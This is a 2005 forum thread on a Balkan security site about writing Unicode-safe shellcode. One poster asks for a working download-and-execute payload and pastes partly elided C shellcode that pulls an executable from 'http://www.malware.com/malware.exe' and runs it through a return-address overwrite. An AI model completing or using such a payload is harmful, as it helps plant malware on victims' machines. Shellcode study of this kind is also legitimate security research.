Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Unicode shellcode

[es] :: Security Coding :: Unicode shellcode

Strane: 1 2

[ Pregleda: 8899 | Odgovora: 23 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Vojislav Milunovic

Član broj: 25
Poruke: 2117
195.252.86.*



+1 Profil

icon Re: Unicode shellcode20.01.2005. u 22:23 - pre 233 meseci
pa umesto \x90\x34 kucaj %u9034 ja mislim da ce to da radi
 
Odgovor na temu

Vertyg01
Banjaluka

Član broj: 39881
Poruke: 41
*.broadband.blic.net.

ICQ: 35878878


Profil

icon Re: Unicode shellcode21.01.2005. u 01:10 - pre 233 meseci
oh hvala nisam ranije primjetio ;)
 
Odgovor na temu

ocamis

Član broj: 63119
Poruke: 1
*.dialup.calypso.lsi.ru.



Profil

icon Re: Unicode shellcode07.07.2005. u 03:51 - pre 227 meseci
Hi.

Can someone give a working example of code in unicode that downloads end execs 1.exe from the same site.
Or mb explain how can i do it myself from this code
Code:
Code:

#include <windows.h>
#include <stdio.h>

char shellcode[]=
"\xEB\x0F\x58\x80\
........
"\x27\x39\x72\x6F\x72\x17"
"m00!"
"http://www.malware.com/malware.exe"
"\x01";

main()
  {
    int *ret;
    ret=(int*)&ret+2;
    (*ret)=(int)shellcode;
  }


reply in english
Thanks.
 
Odgovor na temu

Sundance

Član broj: 7510
Poruke: 2559
*.sava.sczg.hr.



Profil

icon Re: Unicode shellcode07.07.2005. u 07:27 - pre 227 meseci
Read this shit:

Building IA32 'Unicode-Proof' Shellcodes

At the end of the article you have common asm snippets written in a UNICODE-friendly way..
 
Odgovor na temu

[es] :: Security Coding :: Unicode shellcode

Strane: 1 2

[ Pregleda: 8899 | Odgovora: 23 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.